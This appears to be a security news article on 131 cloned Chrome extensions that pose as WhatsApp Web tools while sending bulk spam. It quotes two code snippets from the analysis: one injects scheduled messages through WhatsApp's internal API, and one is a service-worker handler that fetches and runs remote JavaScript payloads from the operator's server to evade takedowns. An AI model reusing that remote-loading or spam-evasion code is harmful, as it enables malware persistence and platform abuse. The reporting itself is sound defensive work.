Over the past several months, cybersecurity researchers have observed a surge of fraudulent Chrome extensions masquerading as legitimate WhatsApp Web automation tools.
These 131 rebranded clones, each presenting as distinct offerings, share an identical codebase designed to automate bulk messaging and scheduling without user consent.
By injecting custom scripts directly into the WhatsApp Web interface, the extensions bypass native rate limits and anti-spam measures.
Each listing advertises features such as message templates, scheduling controls, and analytics dashboards that appeal to small businesses, particularly in Brazil, where WhatsApp is critical for customer outreach.
The extensions exploit Chrome’s Manifest V3 service worker capabilities to run background tasks, scheduling bulk sends without explicit user interaction.
.webp)
Socket.dev analysts noted that the core module leverages a code snippet like:
document.addEventListener('DOMContentLoaded', () => {
const msgHelper = window.WPP.helpers.sendMessage;
scheduledMessages.forEach(({contact, text, time}) => {
setTimeout(() => msgHelper(contact, text), time);
});
});This injection attaches to the page’s DOM and invokes WhatsApp’s internal APIs, blurring the line between legitimate automation and malicious spamming campaigns.
Socket.dev researchers identified that the service worker fetches a remote configuration file hosted on the operator’s infrastructure, enabling dynamic updates to message patterns and throttling parameters to evade detection.
Despite Chrome Web Store policies prohibiting duplicate experiences and unauthorized messaging, all 131 extensions remained live as of mid-October 2025.
Each clone is marketed under glossy landing pages with assurances of privacy compliance and rigorous code audits—claims that contradict platform guidelines.
The extensions are distributed via a franchise-like reseller program: partners pay an upfront fee to license the tool, receive a custom branding package, and manage subscription plans while the original operator retains control over the backend.
Evasion and Persistence Tactics
The most sophisticated aspect of this campaign lies in its detection evasion strategy. By tuning send intervals, randomizing message content, and rotating publisher accounts, the operators maintain continuous operations despite takedown requests.
A key persistence tactic involves polling the operator’s server for updated JavaScript payloads at regular intervals:-
self.addEventListener('periodicsync', event => {
event.waitUntil(
fetch(configUrl)
.then(response => response.json())
.then(cfg => importScripts(cfg.payloadUrl))
);
});This Manifest V3 periodic sync registration ensures that even if Chrome flags a particular payload, the extension can reload an unflagged version from the remote server.
Coupled with varied naming conventions and thousands of active users across listings, the campaign exemplifies policy abuse at scale and underscores the need for enhanced extension governance and user vigilance.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
.webp?w=100&resize=100,70&ssl=1 "Top 10 Best Fraud Prevention Companies in 2025")
